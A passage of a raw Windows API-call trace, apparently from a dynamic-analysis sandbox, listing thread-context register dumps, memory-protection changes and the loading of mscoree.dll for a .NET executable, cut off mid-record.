ThreadHandle=0xfffffffe, Context=0x2555044 | out: Context=0x2555044*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0xb8, [2]=0x43, [3]=0x23, [4]=0xc1, [5]=0x9b, [6]=0x2, [7]=0xb0, [8]=0xbb, [9]=0x42, [10]=0x22, [11]=0xc2, [12]=0xf7, [13]=0x63, [14]=0x8d, [15]=0x2b, [16]=0xd6, [17]=0x88, [18]=0x1b, [19]=0x63, [20]=0xed, [21]=0xeb, [22]=0x13, [23]=0x27, [24]=0x28, [25]=0x4b, [26]=0xb, [27]=0x1c, [28]=0x40, [29]=0xbe, [30]=0xfd, [31]=0x57, [32]=0xb1, [33]=0xf1, [34]=0xc6, [35]=0xda, [36]=0x58, [37]=0x84, [38]=0x2e, [39]=0x1b, [40]=0x19, [41]=0x8, [42]=0x32, [43]=0xfd, [44]=0x32, [45]=0x4a, [46]=0xc0, [47]=0x38, [48]=0x2f, [49]=0xea, [50]=0x9d, [51]=0xdd, [52]=0xb0, [53]=0x33, [54]=0xe0, [55]=0x3d, [56]=0xe4, [57]=0x28, [58]=0x66, [59]=0xc8, [60]=0x4, [61]=0xa0, [62]=0xcc, [63]=0xd6, [64]=0x9a, [65]=0x16, [66]=0x34, [67]=0x4b, [68]=0x4a, [69]=0x93, [70]=0xc1, [71]=0x23, [72]=0xef, [73]=0xc, [74]=0x41, [75]=0x7c, [76]=0xd1, [77]=0xac, [78]=0x1f, [79]=0x27, [80]=0xc9, [81]=0x3c, [82]=0x70, [83]=0xf9, [84]=0x3b, [85]=0x4b, [86]=0xb, [87]=0x1e, [88]=0x10, [89]=0xf2, [90]=0x40, [91]=0x72, [92]=0xd, [93]=0xc1, [94]=0xd8, [95]=0x16, [96]=0xf7, [97]=0xb5, [98]=0x44, [99]=0xd4, [100]=0x62, [101]=0x55, [102]=0xe6, [103]=0x14, [104]=0x76, [105]=0xa5, [106]=0x8d, [107]=0x40, [108]=0xbc, [109]=0x30, [110]=0xdd, [111]=0x54, [112]=0xa9, [113]=0xe3, [114]=0x14, [115]=0xd6, [116]=0x93, [117]=0xb9, [118]=0x78, [119]=0xfe, [120]=0x7d, [121]=0xb6, [122]=0x2e, [123]=0x8, [124]=0xb7, [125]=0x1f, [126]=0x67, [127]=0x22, [128]=0x57, [129]=0x94, [130]=0x4a, [131]=0x8e, [132]=0x6a, [133]=0x14, [134]=0xb8, [135]=0xeb, [136]=0xa8, [137]=0x85, [138]=0xfe, [139]=0xfa, [140]=0x55, [141]=0xb1, [142]=0xf6, [143]=0x5e, [144]=0x43, [145]=0x62, [146]=0xc5, [147]=0x24, [148]=0x69, [149]=0xc3, [150]=0x16, [151]=0x76, [152]=0xc2, [153]=0x1f, [154]=0x64, [155]=0x65, [156]=0x70, [157]=0xa9, [158]=0x23, [159]=0x24, [160]=0x4c, [161]=0x42, [162]=0x1, [163]=0x1, [164]=0x5e, [165]=0xae, [166]=0x4a, [167]=0x68, [168]=0x64, [169]=0x71, [170]=0xd6, [171]=0x7c, [172]=0x8c, [173]=0xf1, [174]=0xb0, [175]=0xe8, [176]=0x88, [177]=0xaa, [178]=0x16, [179]=0x8b, [180]=0xf, [181]=0x6d, [182]=0xe3, [183]=0xdc, [184]=0x7d, [185]=0x58, [186]=0x40, [187]=0x3, [188]=0xd4, [189]=0xa, [190]=0xca, [191]=0x79, [192]=0x88, [193]=0xba, [194]=0x6, [195]=0x28, [196]=0x59, [197]=0x91, [198]=0x53, [199]=0x3a, [200]=0x4f, [201]=0xc7, [202]=0x94, [203]=0xa2, [204]=0xd6, [205]=0x22, [206]=0xca, [207]=0xea, [208]=0x3, [209]=0x57, [210]=0x58, [211]=0x8, [212]=0xc8, [213]=0x2, [214]=0x9f, [215]=0xba, [216]=0x7, [217]=0xe4, [218]=0xcd, [219]=0x3e, [220]=0xc1, [221]=0xef, [222]=0xca, [223]=0xec, [224]=0xdb, [225]=0xea, [226]=0x39, [227]=0x32, [228]=0xb, [229]=0x1f, [230]=0xe2, [231]=0x9d, [232]=0xc9, [233]=0x80, [234]=0xdf, [235]=0xa9, [236]=0x94, [237]=0xff, [238]=0xc6, [239]=0x34, [240]=0xfc, [241]=0x3c, [242]=0x7b, [243]=0xa5, [244]=0xb6, [245]=0x4a, [246]=0x23, [247]=0xbe, [248]=0x3c, [249]=0xfd, [250]=0x3c, [251]=0x13, [252]=0x4a, [253]=0xce, [254]=0x3b, [255]=0x26, [256]=0x34, [257]=0xa, [258]=0x1e, [259]=0xca, [260]=0xfa, [261]=0x11, [262]=0x73, [263]=0xc7, [264]=0x7c, [265]=0x65, [266]=0x94, [267]=0x2d, [268]=0xa3, [269]=0x9b, [270]=0x90, [271]=0x4a, [272]=0x9c, [273]=0x15, [274]=0xd1, [275]=0x0, [276]=0x71, [277]=0x3, [278]=0xde, [279]=0x2b, [280]=0xc3, [281]=0x95, [282]=0xfb, [283]=0xb6, [284]=0x96, [285]=0xee, [286]=0x77, [287]=0x7d, [288]=0x1c, [289]=0x44, [290]=0x8, [291]=0x94, [292]=0xc, [293]=0xf1, [294]=0xfb, [295]=0x5b, [296]=0x6b, [297]=0x19, [298]=0x43, [299]=0x92, [300]=0x9e, [301]=0xa0, [302]=0x3a, [303]=0x39, [304]=0x70, [305]=0x78, [306]=0xc0, [307]=0xf5, [308]=0xaa, [309]=0xdd, [310]=0x71, [311]=0x3f, [312]=0xe1, [313]=0xee, [314]=0xc1, [315]=0xc4, [316]=0x9c, [317]=0x8, [318]=0x4b, [319]=0x7, [320]=0x2f, [321]=0x16, [322]=0x32, [323]=0x1a, [324]=0xcf, [325]=0xbd, [326]=0xbe, [327]=0xac, [328]=0xdd, [329]=0xaf, [330]=0x35, [331]=0x16, [332]=0xc9, [333]=0x82, [334]=0xaa, [335]=0x5b, [336]=0x32, [337]=0x3c, [338]=0xf4, [339]=0xa0, [340]=0xcd, [341]=0x4f, [342]=0x7f, [343]=0x12, [344]=0x82, [345]=0xd9, [346]=0x5a, [347]=0xe3, [348]=0x9a, [349]=0x1f, [350]=0x48, [351]=0xfd, [352]=0x5d, [353]=0x29, [354]=0xc4, [355]=0xe4, [356]=0x65, [357]=0xef, [358]=0xcb, [359]=0xa4, [360]=0xa4, [361]=0xa7, [362]=0xa7, [363]=0xa2, [364]=0x18, [365]=0xa0, [366]=0x65, [367]=0x74, [368]=0x5b, [369]=0x1f, [370]=0xde, [371]=0xa3, [372]=0x39, [373]=0xb7, [374]=0xa7, [375]=0x8, [376]=0xbc, [377]=0x8b, [378]=0x68, [379]=0xf2, [380]=0xa0, [381]=0xb9, [382]=0x2c, [383]=0xdc, [384]=0x1c, [385]=0x10, [386]=0xf9, [387]=0xe0, [388]=0x7f, [389]=0x19, [390]=0xff, [391]=0x27, [392]=0x67, [393]=0x86, [394]=0x78, [395]=0x7e, [396]=0xf5, [397]=0xef, [398]=0x51, [399]=0xb5, [400]=0x3a, [401]=0xf9, [402]=0x69, [403]=0xbd, [404]=0xae, [405]=0xa9, [406]=0x95, [407]=0x14, [408]=0x4, [409]=0x9a, [410]=0x5b, [411]=0xbf, [412]=0x80, [413]=0x47, [414]=0xe7, [415]=0x9c, [416]=0xe8, [417]=0x4d, [418]=0xfc, [419]=0x4d, [420]=0x67, [421]=0xcd, [422]=0xf9, [423]=0x60, [424]=0x8c, [425]=0xfd, [426]=0xee, [427]=0x33, [428]=0x1a, [429]=0xc3, [430]=0xfb, [431]=0x21, [432]=0xa8, [433]=0xc4, [434]=0x97, [435]=0x5e, [436]=0x75, [437]=0x92, [438]=0xb4, [439]=0x75, [440]=0xd8, [441]=0x1c, [442]=0xc9, [443]=0x47, [444]=0x76, [445]=0xa9, [446]=0xa9, [447]=0x53, [448]=0x33, [449]=0x26, [450]=0x5, [451]=0x2b, [452]=0x36, [453]=0xd6, [454]=0x22, [455]=0x7a, [456]=0x39, [457]=0x8d, [458]=0x1f, [459]=0x36, [460]=0xbe, [461]=0x9a, [462]=0xed, [463]=0x4d, [464]=0x3, [465]=0x5e, [466]=0x81, [467]=0x34, [468]=0x14, [469]=0xf0, [470]=0x17, [471]=0x9d, [472]=0xb8, [473]=0xe0, [474]=0xaf, [475]=0x7d, [476]=0x4a, [477]=0x4, [478]=0x62, [479]=0x15, [480]=0xee, [481]=0x6d, [482]=0x6d, [483]=0x5f, [484]=0x2b, [485]=0x18, [486]=0x98, [487]=0xf8, [488]=0x45, [489]=0x48, [490]=0x56, [491]=0x94, [492]=0x10, [493]=0xc4, [494]=0xf4, [495]=0x88, [496]=0x80, [497]=0x6, [498]=0xf9, [499]=0x7a, [500]=0x5a, [501]=0x9, [502]=0x84, [503]=0x86, [504]=0x79, [505]=0x4a, [506]=0xd0, [507]=0x4d, [508]=0x4, [509]=0xa0, [510]=0xf1, [511]=0xb7))) returned 0x0 [0126.906] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x2540800*=0x400000, NumberOfBytesToProtect=0x2540808, NewAccessProtection=0x4, OldAccessProtection=0x2dfc20 | out: BaseAddress=0x2540800*=0x400000, NumberOfBytesToProtect=0x2540808, OldAccessProtection=0x2dfc20*=0x2) returned 0x0 [0127.118] LoadLibraryA (lpLibFileName="mscoree.dll") returned 0x74480000 [0127.119] GetProcAddress (hModule=0x74480000, lpProcName="_CorExeMain") returned 0x74484ddb [0127.125] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2555044 | out: Context=0x2555044*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0xb8, [2]=0x43, [3]=0x23, [4]=0xc1, [5]=0x9b, [6]=0x2, [7]=0xb0, [8]=0xbb, [9]=0x42, [10]=0x22, [11]=0xc2, [12]=0xf7, [13]=0x63, [14]=0x8d, [15]=0x2b, [16]=0xd6, [17]=0x88, [18]=0x1b, [19]=0x63, [20]=0xed, [21]=0xeb, [22]=0x13, [23]=0x27, [24]=0x28, [25]=0x4b, [26]=0xb, [27]=0x1c, [28]=0x40, [29]=0xbe, [30]=0xfd, [31]=0x57, [32]=0xb1, [33]=0xf1, [34]=0xc6, [35]=0xda, [36]=0x58, [37]=0x84, [38]=0x2e, [39]=0x1b, [40]=0x19, [41]=0x8, [42]=0x32, [43]=0xfd, [44]=0x32, [45]=0x4a, [46]=0xc0, [47]=0x38, [48]=0x2f, [49]=0xea, [50]=0x9d, [51]=0xdd, [52]=0xb0, [53]=0x33, [54]=0xe0, [55]=0x3d, [56]=0xe4, [57]=0x28, [58]=0x66, [59]=0xc8, [60]=0x4, [61]=0xa0, [62]=0xcc, [63]=0xd6, [64]=0x9a, [65]=0x16, [66]=0x34, [67]=0x4b, [68]=0x4a, [69]=0x93, [70]=0xc1, [71]=0x23, [72]=0xef, [73]=0xc, [74]=0x41, [75]=0x7c, [76]=0xd1, [77]=0xac, [78]=0x1f, [79]=0x27, [80]=0xc9, [81]=0x3c, [82]=0x70, [83]=0xf9, [84]=0x3b, [85]=0x4b, [86]=0xb, [87]=0x1e, [88]=0x10, [89]=0xf2, [90]=0x40, [91]=0x72, [92]=0xd, [93]=0xc1, [94]=0xd8, [95]=0x16, [96]=0xf7, [97]=0xb5, [98]=0x44, [99]=0xd4, [100]=0x62, [101]=0x55, [102]=0xe6, [103]=0x14, [104]=0x76, [105]=0xa5, [106]=0x8d, [107]=0x40, [108]=0xbc, [109]=0x30, [110]=0xdd, [111]=0x54, [112]=0xa9, [113]=0xe3, [114]=0x14, [115]=0xd6, [116]=0x93, [117]=0xb9, [118]=0x78, [119]=0xfe, [120]=0x7d, [121]=0xb6, [122]=0x2e, [123]=0x8, [124]=0xb7, [125]=0x1f, [126]=0x67, [127]=0x22, [128]=0x57, [129]=0x94, [130]=0x4a, [131]=0x8e, [132]=0x6a, [133]=0x14, [134]=0xb8, [135]=0xeb, [136]=0xa8, [137]=0x85, [138]=0xfe, [139]=0xfa, [140]=0x55, [141]=0xb1, [142]=0xf6, [143]=0x5e, [144]=0x43, [145]=0x62, [146]=0xc5, [147]=0x24, [148]=0x69, [149]=0xc3, [150]=0x16, [151]=0x76, [152]=0xc2, [153]=0x1f, [154]=0x64, [155]=0x65, [156]=0x70, [157]=0xa9, [158]=0x23, [159]=0x24, [160]=0x4c, [161]=0x42, [162]=0x1, [163]=0x1, [164]=0x5e, [165]=0xae, [166]=0x4a, [167]=0x68, [168]=0x64, [169]=0x71, [170]=0xd6, [171]=0x7c, [172]=0x8c, [173]=0xf1, [174]=0xb0, [175]=0xe8, [176]=0x88, [177]=0xaa, [178]=0x16, [179]=0x8b, [180]=0xf, [181]=0x6d, [182]=0xe3, [183]=0xdc, [184]=0x7d, [185]=0x58, [186]=0x40, [187]=0x3, [188]=0xd4, [189]=0xa, [190]=0xca, [191]=0x79, [192]=0x88, [193]=0xba, [194]=0x6, [195]=0x28, [196]=0x59, [197]=0x91, [198]=0x53, [199]=0x3a, [200]=0x4f, [201]=0xc7, [202]=0x94, [203]=0xa2, [204]=0xd6, [205]=0x22, [206]=0xca, [207]=0xea, [208]=0x3, [209]=0x57, [210]=0x58, [211]=0x8, [212]=0xc8, [213]=0x2, [214]=0x9f, [215]=0xba, [216]=0x7, [217]=0xe4, [218]=0xcd, [219]=0x3e, [220]=0xc1, [221]=0xef, [222]=0xca, [223]=0xec, [224]=0xdb, [225]=0xea, [226]=0x39, [227]=0x32, [228]=0xb, [229]=0x1f, [230]=0xe2, [231]=0x9d, [232]=0xc9, [233]=0x80, [234]=0xdf, [235]=0xa9, [236]=0x94, [237]=0xff, [238]=0xc6, [239]=0x34, [240]=0xfc, [241]=0x3c, [242]=0x7b, [243]=0xa5, [244]=0xb6, [245]=0x4a, [246]=0x23, [247]=0xbe, [248]=0x3c, [249]=0xfd, [250]=0x3c, [251]=0x13, [252]=0x4a, [253]=0xce, [254]=0x3b, [255]=0x26, [256]=0x34, [257]=0xa, [258]=0x1e, [259]=0xca, [260]=0xfa, [261]=0x11, [262]=0x73, [263]=0xc7, [264]=0x7c, [265]=0x65, [266]=0x94, [267]=0x2d, [268]=0xa3, [269]=0x9b, [270]=0x90, [271]=0x4a, [272]=0x9c, [273]=0x15, [274]=0xd1, [275]=0x0, [276]=0x71, [277]=0x3, [278]=0xde, [279]=0x2b, [280]=0xc3, [281]=0x95, [282]=0xfb, [283]=0xb6, [284]=0x96, [285]=0xee, [286]=0x77, [287]=0x7d, [288]=0x1c, [289]=0x44, [290]=0x8, [291]=0x94, [292]=0xc, [293]=0xf1, [294]=0xfb, [295]=0x5b, [296]=0x6b, [297]=0x19, [298]=0x43, [299]=0x92, [300]=0x9e, [301]=0xa0, [302]=0x3a, [303]=0x39, [304]=0x70, [305]=0x78, [306]=0xc0, [307]=0xf5, [308]=0xaa, [309]=0xdd, [310]=0x71, [311]=0x3f, [312]=0xe1, [313]=0xee, [314]=0xc1, [315]=0xc4, [316]=0x9c, [317]=0x8, [318]=0x4b, [319]=0x7, [320]=0x2f, [321]=0x16, [322]=0x32, [323]=0x1a, [324]=0xcf, [325]=0xbd, [326]=0xbe, [327]=0xac, [328]=0xdd, [329]=0xaf, [330]=0x35, [331]=0x16, [332]=0xc9, [333]=0x82, [334]=0xaa, [335]=0x5b, [336]=0x32, [337]=0x3c, [338]=0xf4, [339]=0xa0, [340]=0xcd, [341]=0x4f, [342]=0x7f, [343]=0x12, [344]=0x82, [345]=0xd9, [346]=0x5a, [347]=0xe3, [348]=0x9a, [349]=0x1f, [350]=0x48, [351]=0xfd, [352]=0x5d, [353]=0x29, [354]=0xc4, [355]=0xe4, [356]=0x65, [357]=0xef, [358]=0xcb, [359]=0xa4, [360]=0xa4, [361]=0xa7, [362]=0xa7, [363]=0xa2, [364]=0x18, [365]=0xa0, [366]=0x65, [367]=0x74, [368]=0x5b, [369]=0x1f, [370]=0xde, [371]=0xa3, [372]=0x39, [373]=0xb7, [374]=0xa7, [375]=0x8, [376]=0xbc, [377]=0x8b, [378]=0x68, [379]=0xf2, [380]=0xa0, [381]=0xb9, [382]=0x2c, [383]=0xdc, [384]=0x1c, [385]=0x10, [386]=0xf9, [387]=0xe0, [388]=0x7f, [389]=0x19, [390]=0xff, [391]=0x27, [392]=0x67, [393]=0x86, [394]=0x78, [395]=0x7e, [396]=0xf5, [397]=0xef, [398]=0x51, [399]=0xb5, [400]=0x3a, [401]=0xf9, [402]=0x69, [403]=0xbd, [404]=0xae, [405]=0xa9, [406]=0x95, [407]=0x14, [408]=0x4, [409]=0x9a, [410]=0x5b, [411]=0xbf, [412]=0x80, [413]=0x47, [414]=0xe7, [415]=0x9c, [416]=0xe8, [417]=0x4d, [418]=0xfc, [419]=0x4d, [420]=0x67, [421]=0xcd, [422]=0xf9, [423]=0x60, [424]=0x8c, [425]=0xfd, [426]=0xee, [427]=0x33, [428]=0x1a, [429]=0xc3, [430]=0xfb, [431]=0x21, [432]=0xa8, [433]=0xc4, [434]=0x97, [435]=0x5e, [436]=0x75, [437]=0x92, [438]=0xb4, [439]=0x75, [440]=0xd8, [441]=0x1c, [442]=0xc9, [443]=0x47, [444]=0x76, [445]=0xa9, [446]=0xa9, [447]=0x53, [448]=0x33, [449]=0x26, [450]=0x5, [451]=0x2b, [452]=0x36, [453]=0xd6, [454]=0x22, [455]=0x7a, [456]=0x39, [457]=0x8d, [458]=0x1f, [459]=0x36, [460]=0xbe, [461]=0x9a, [462]=0xed, [463]=0x4d, [464]=0x3, [465]=0x5e, [466]=0x81, [467]=0x34, [468]=0x14, [469]=0xf0, [470]=0x17, [471]=0x9d, [472]=0xb8, [473]=0xe0, [474]=0xaf, [475]=0x7d, [476]=0x4a, [477]=0x4, [478]=0x62, [479]=0x15, [480]=0xee, [481]=0x6d, [482]=0x6d, [483]=0x5f, [484]=0x2b, [485]=0x18, [486]=0x98, [487]=0xf8, [488]=0x45, [489]=0x48, [490]=0x56, [491]=0x94, [492]=0x10, [493]=0xc4, [494]=0xf4, [495]=0x88, [496]=0x80, [497]=0x6, [498]=0xf9, [499]=0x7a, [500]=0x5a, [501]=0x9, [502]=0x84, [503]=0x86, [504]=0x79, [505]=0x4a, [506]=0xd0, [507]=0x4d, [508]=0x4, [509]=0xa0, [510]=0xf1, [511]=0xb7))) returned 0x0 [0127.131] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x2dfc7c*=0x402000, NumberOfBytesToProtect=0x2541008, NewAccessProtection=0x20, OldAccessProtection=0x2dfc20 | out: BaseAddress=0x2dfc7c*=0x402000, NumberOfBytesToProtect=0x2541008, OldAccessProtection=0x2dfc20*=0x4) returned 0x0 [0127.138] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2555044 | out: Context=0x2555044*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0xb8, [2]=0x43, [3]=0x23, [4]=0xc1, [5]=0x9b, [6]=0x2, [7]=0xb0, [8]=0xbb, [9]=0x42, [10]=0x22, [11]=0xc2, [12]=0xf7, [13]=0x63, [14]=0x8d, [15]=0x2b, [16]=0xd6, [17]=0x88, [18]=0x1b, [19]=0x63, [20]=0xed, [21]=0xeb, [22]=0x13, [23]=0x27, [24]=0x28, [25]=0x4b, [26]=0xb, [27]=0x1c, [28]=0x40, [29]=0xbe, [30]=0xfd, [31]=0x57, [32]=0xb1, [33]=0xf1, [34]=0xc6, [35]=0xda, [36]=0x58, [37]=0x84, [38]=0x2e, [39]=0x1b, [40]=0x19, [41]=0x8, [42]=0x32, [43]=0xfd, [44]=0x32, [45]=0x4a, [46]=0xc0, [47]=0x38, [48]=0x2f, [49]=0xea, [50]=0x9d, [51]=0xdd, [52]=0xb0, [53]=0x33, [54]=0xe0, [55]=0x3d, [56]=0xe4, [57]=0x28, [58]=0x66, [59]=0xc8, [60]=0x4, [61]=0xa0, [62]=0xcc, [63]=0xd6, [64]=0x9a, [65]=0x16, [66]=0x34, [67]=0x4b, [68]=0x4a, [69]=0x93, [70]=0xc1, [71]=0x23, [72]=0xef, [73]=0xc, [74]=0x41, [75]=0x7c, [76]=0xd1, [77]=0xac, [78]=0x1f, [79]=0x27, [80]=0xc9, [81]=0x3c, [82]=0x70, [83]=0xf9, [84]=0x3b, [85]=0x4b, [86]=0xb, [87]=0x1e, [88]=0x10, [89]=0xf2, [90]=0x40, [91]=0x72, [92]=0xd, [93]=0xc1, [94]=0xd8, [95]=0x16, [96]=0xf7, [97]=0xb5, [98]=0x44, [99]=0xd4, [100]=0x62, [101]=0x55, [102]=0xe6, [103]=0x14, [104]=0x76, [105]=0xa5, [106]=0x8d, [107]=0x40, [108]=0xbc, [109]=0x30, [110]=0xdd, [111]=0x54, [112]=0xa9, [113]=0xe3, [114]=0x14, [115]=0xd6, [116]=0x93, [117]=0xb9, [118]=0x78, [119]=0xfe, [120]=0x7d, [121]=0xb6, [122]=0x2e, [123]=0x8, [124]=0xb7, [125]=0x1f, [126]=0x67, [127]=0x22, [128]=0x57, [129]=0x94, [130]=0x4a, [131]=0x8e, [132]=0x6a, [133]=0x14, [134]=0xb8, [135]=0xeb, [136]=0xa8, [137]=0x85, [138]=0xfe, [139]=0xfa, [140]=0x55, [141]=0xb1, [142]=0xf6, [143]=0x5e, [144]=0x43, [145]=0x62, [146]=0xc5, [147]=0x24, [148]=0x69, [149]=0xc3, [150]=0x16, [151]=0x76, [152]=0xc2, [153]=0x1f, [154]=0x64, [155]=0x65, [156]=0x70, [157]=0xa9, [158]=0x23, [159]=0x24, [160]=0x4c, [161]=0x42, [162]=0x1, [163]=0x1, [164]=0x5e, [165]=0xae, [166]=0x4a, [167]=0x68, [168]=0x64, [169]=0x71, [170]=0xd6, [171]=0x7c, [172]=0x8c, [173]=0xf1, [174]=0xb0, [175]=0xe8, [176]=0x88, [177]=0xaa, [178]=0x16, [179]=0x8b, [180]=0xf, [181]=0x6d, [182]=0xe3, [183]=0xdc, [184]=0x7d, [185]=0x58, [186]=0x40, [187]=0x3, [188]=0xd4, [189]=0xa, [190]=0xca, [191]=0x79, [192]=0x88, [193]=0xba, [194]=0x6, [195]=0x28, [196]=0x59, [197]=0x91, [198]=0x53, [199]=0x3a, [200]=0x4f, [201]=0xc7, [202]=0x94, [203]=0xa2, [204]=0xd6, [205]=0x22, [206]=0xca, [207]=0xea, [208]=0x3, [209]=0x57, [210]=0x58, [211]=0x8, [212]=0xc8, [213]=0x2, [214]=0x9f, [215]=0xba, [216]=0x7, [217]=0xe4, [218]=0xcd, [219]=0x3e, [220]=0xc1, [221]=0xef, [222]=0xca, [223]=0xec, [224]=0xdb, [225]=0xea, [226]=0x39, [227]=0x32, [228]=0xb, [229]=0x1f, [230]=0xe2, [231]=0x9d, [232]=0xc9, [233]=0x80, [234]=0xdf, [235]=0xa9, [236]=0x94, [237]=0xff, [238]=0xc6, [239]=0x34, [240]=0xfc, [241]=0x3c, [242]=0x7b, [243]=0xa5, [244]=0xb6, [245]=0x4a, [246]=0x23, [247]=0xbe, [248]=0x3c, [249]=0xfd, [250]=0x3c, [251]=0x13, [252]=0x4a, [253]=0xce, [254]=0x3b, [255]=0x26, [256]=0x34, [257]=0xa, [258]=0x1e, [259]=0xca, [260]=0xfa, [261]=0x11, [262]=0x73, [263]=0xc7, [264]=0x7c, [265]=0x65, [266]=0x94, [267]=0x2d, [268]=0xa3, [269]=0x9b, [270]=0x90, [271]=0x4a, [272]=0x9c, [273]=0x15, [274]=0xd1, [275]=0x0, [276]=0x71, [277]=0x3, [278]=0xde, [279]=0x2b, [280]=0xc3, [281]=0x95, [282]=0xfb, [283]=0xb6, [284]=0x96, [285]=0xee, [286]=0x77, [287]=0x7d, [288]=0x1c, [289]=0x44, [290]=0x8, [291]=0x94, [292]=0xc, [293]=0xf1, [294]=0xfb, [295]=0x5b, [296]=0x6b, [297]=0x19, [298]=0x43, [299]=0x92, [300]=0x9e, [301]=0xa0, [302]=0x3a, [303]=0x39, [304]=0x70, [305]=0x78, [306]=0xc0, [307]=0xf5, [308]=0xaa, [309]=0xdd, 